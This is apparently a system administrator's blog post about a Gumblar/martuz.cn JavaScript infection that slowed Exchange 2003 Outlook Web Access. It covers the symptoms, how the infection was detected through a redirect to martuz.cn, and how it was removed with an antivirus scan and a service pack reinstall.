Martuz.cn / Gumblar exploit causing Microsoft Exchange 2003 OWA to run extremely slow after login and how to fix this problem.
Martuz.cn / Gumblar Exploit root cause of the OWA problem
Symptoms of Microsoft Exchange 2003 Outlook Web Access and martuz.cn JavaScript virus infection
Within the last few days one of our main Exchange 2003 Server Outlook Web Access became painfully slow. Symptoms were related to main browser window in Internet Explorer displaying just the vertical bar that separates the folders and the message area and getting stuck there for about 30 seconds and then finally loading the rest of the page. Double clicking and opening a message would pop open the blank message window with a http://your servername…. In the lower left hand status bar of the pop up window and finally after about 30 seconds would load the window. Same thing would happen composing a new mail message in OWA. Everything worked normally accept that tasks became slower for users in OWA.
Martuz.cn JavaScript virus infection detection
We are running the latest version of Symantec Norton Endpoint Security which did not report any virus, Trojans, or spywares on the Exchange 2003 server. Looking further into the situation we noticed that when the browser window for the Outlook Web Access opened the task bar of the browser window would display http://yourservername…. and then would change to http://martuz.cn/vid/… for a few seconds and OWA window would finally open. This indicated some infection. Our analyses showed that OWA was running an infected java script within the OWA pages that caused the problem to appear. Apparently Symantec End Point Security on had no clue about this infection and we are still unsure about how server got infected. Googling and doing the research we have seen reports of PHP exploit or FTP exploit for the cause of the infection of the virus.
Martuz.cn JavaScript virus infection removal
First of all to see if you have the same problem as described here by logging into to the OWA account and watch at message on the bottom left side of the task bar of the browser window after the login which would say “Waiting for http://yourservername/exchange” if at any time it changes to waiting for http://martuz.cn… And then disappears you have the same problem.
Download and install the Microsoft Forefront Client Security trial version and install on the server, we left Symantec End Point Security running at the same time without any problem. Scan your entire Exchange installation folder only on your server for a quick check. If you see the message related to Gumblar Trojan then you server is infected. Infected files will be in \Exchsrvr\exchweb\controls and or D:\Exchsrvr\exchweb\6.5.7651.60 or something similar. Backup the entire exchweb folder just in case. Chose the option to remove the virus infected file. Re-install Exchange 2003 Service Pack which would re-populate the files removed by the anti-virus software.
Summary:
Martuz.cn / Gumblar is a JavaScript exploit that inserts itself into the legitimate OWA files. There is no definite known cause of how this virus gets installed on the server. Microsoft Forefront Security client seems to do a good job of detecting and removing the virus. You need to re-install service pack in order to re-introduce the files removed during the virus removal.
Leave A Comment